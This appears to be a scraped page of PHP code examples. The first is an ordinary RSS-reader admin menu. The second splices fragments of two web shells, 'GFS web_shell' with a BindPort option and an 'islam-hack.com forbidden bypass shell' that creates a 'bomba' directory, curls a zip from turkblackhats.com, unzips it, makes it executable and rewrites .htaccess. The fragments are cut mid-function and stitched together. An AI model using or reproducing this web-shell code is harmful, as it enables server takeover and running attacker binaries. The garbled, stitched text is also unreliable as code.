Ejemplo n.º 1
0
/**
 * main function. checks for authorization and renders the
 * required admin section.
 */
function admin_main($authorised)
{
    echo "\n<div id=\"channel_admin\" class=\"frame\">";
    if ($authorised) {
        admin_menu();
        if (array_key_exists(CST_ADMIN_DOMAIN, $_REQUEST)) {
            switch ($_REQUEST[CST_ADMIN_DOMAIN]) {
                case CST_ADMIN_DOMAIN_FOLDER:
                    $show = folder_admin();
                    break;
                case CST_ADMIN_DOMAIN_CHANNEL:
                    $show = channel_admin();
                    break;
                case CST_ADMIN_DOMAIN_CONFIG:
                    $show = config_admin();
                    break;
                case CST_ADMIN_DOMAIN_ITEM:
                    $show = item_admin();
                    break;
                case CST_ADMIN_DOMAIN_PLUGINS:
                    $show = plugins_admin();
                    break;
                case CST_ADMIN_DOMAIN_THEMES:
                    $show = themes_admin();
                    break;
                case CST_ADMIN_DOMAIN_TAGS:
                    $show = tags_admin();
                    break;
                case CST_ADMIN_DOMAIN_PLUGIN_OPTIONS:
                    $show = plugin_options_admin();
                    break;
                case CST_ADMIN_DOMAIN_THEME_OPTIONS:
                    $show = theme_options_admin();
                    break;
                default:
                    break;
            }
        }
        if (array_key_exists(CST_ADMIN_VIEW, $_REQUEST) || isset($show)) {
            if (!isset($show)) {
                $show = $_REQUEST[CST_ADMIN_VIEW];
            }
            switch ($show) {
                case CST_ADMIN_DOMAIN_CONFIG:
                    config();
                    break;
                case CST_ADMIN_DOMAIN_CHANNEL:
                    channels();
                    break;
                case CST_ADMIN_DOMAIN_FOLDER:
                    folders();
                    break;
                case CST_ADMIN_DOMAIN_OPML:
                    opml();
                    break;
                case CST_ADMIN_DOMAIN_NONE:
                    break;
                case CST_ADMIN_DOMAIN_ITEM:
                    items();
                    break;
                case CST_ADMIN_DOMAIN_SYSINFO:
                    sysinfo();
                    break;
                case CST_ADMIN_DOMAIN_DASHBOARD:
                    dashboard();
                    break;
                case CST_ADMIN_DOMAIN_PLUGINS:
                    plugins();
                    break;
                case CST_ADMIN_DOMAIN_THEMES:
                    themes();
                    break;
                case CST_ADMIN_DOMAIN_TAGS:
                    tags();
                    break;
                case CST_ADMIN_DOMAIN_PLUGIN_OPTIONS:
                    plugin_options();
                    break;
                case CST_ADMIN_DOMAIN_THEME_OPTIONS:
                    theme_options();
                    break;
                default:
            }
        } else {
            if (true == getConfig('rss.config.defaultdashboard')) {
                dashboard();
            } else {
                channels();
            }
        }
        echo "\n<div class=\"clearer\"></div>\n";
    } else {
        rss_error(sprintf(__('<h1>Not Authorized!</h1>You are not authorized to access the administration interface. Please follow <a href="%s">this link</a> back to the main page. Have  a nice day!'), getPath()), RSS_ERROR_ERROR, true);
    }
    echo "</div>\n";
}
Ejemplo n.º 2
0
                    mysql_close($conn_id);
                }
            }
            echo "</table>";
        }
    }
}
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////// КОД //////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
echo $HTML;
echo "<font  face=Verdana size=2 color=blue><b>";
echo rep_char("&nbsp;", 15);
echo "GFS web_shell ver 3.1.7 </b></font>";
echo "<hr size=3 color=black>";
sysinfo();
echo "<form action=\"" . $HTTP_REFERER . "\" method=\"POST\" enctype=\"multipart/form-data\">";
echo "<table BORDER=1 align=center>";
if ($r_act == "nav" or $r_act == NULL) {
    echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
} else {
    echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
}
if (!$safe_mode) {
    if ($r_act == "bind") {
        echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
    } else {
        echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
    }
}
if (function_exists(fsockopen)) {
            $a = 65;
            $b = 90;
        }
        if ($part == 3) {
            $a = 97;
            $b = 122;
        }
        $code_part = chr(rand($a, $b));
        @($newcode_length = $newcode_length + 1);
        @($newcode = $newcode . $code_part);
    }
    return $newcode;
}
# PHP Variables :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: PHP Variables #
echo "<CENTER>\n  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse; border-style: solid; border-color: #C0C0C0; padding-left: 4; padding-right: 4; padding-top: 1; padding-bottom: 1' bordercolor='#111111' width='86%' bgcolor='#E0E0E0'>\n    <tr>\n      <td bgcolor='#AA0000' class='td'><div align='center' class='style4'>: www.islam-hack.com forbidden  bypass shell : </div></td>\n    </tr>\n    <tr>\n      <td style='padding:5px 5px 5px 5px '>";
echo sysinfo();
echo "\t  </td>\n    </tr>\n    <tr>\n      <td bgcolor='#AA0000' class='td' style='padding:0px 0px 0px 5px'><div align='center' class='style4'>\n        <div align='left'>\n          <form name='form4' method='post' action=''>\n             View Directory : \n             <input name='GoDir' type='text' class='DIR' id='GoDir' size='120'>\n          </form>\n        </div>\n      </div></td>\n    </tr>\n    <tr>\n    <td width='100%' height='280' style='padding:20px 20px 20px 20px '>";
if (isset($_POST['Submit2'])) {
    @mkdir("bomba");
    @chdir("bomba");
    @exec('curl http://turkblackhats.com/priv/ln.zip -o ln.zip');
    @exec('unzip ln.zip');
    @exec('chmod 755 ln');
    echo '<font color=green>[+] Directory [ bomba ] Created .</font><Br>';
    echo '<font color=green>[+] Directory Changed .</font><Br>';
    $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php';
    $fp3 = fopen('.htaccess', 'w');
    $fw3 = fwrite($fp3, $file3);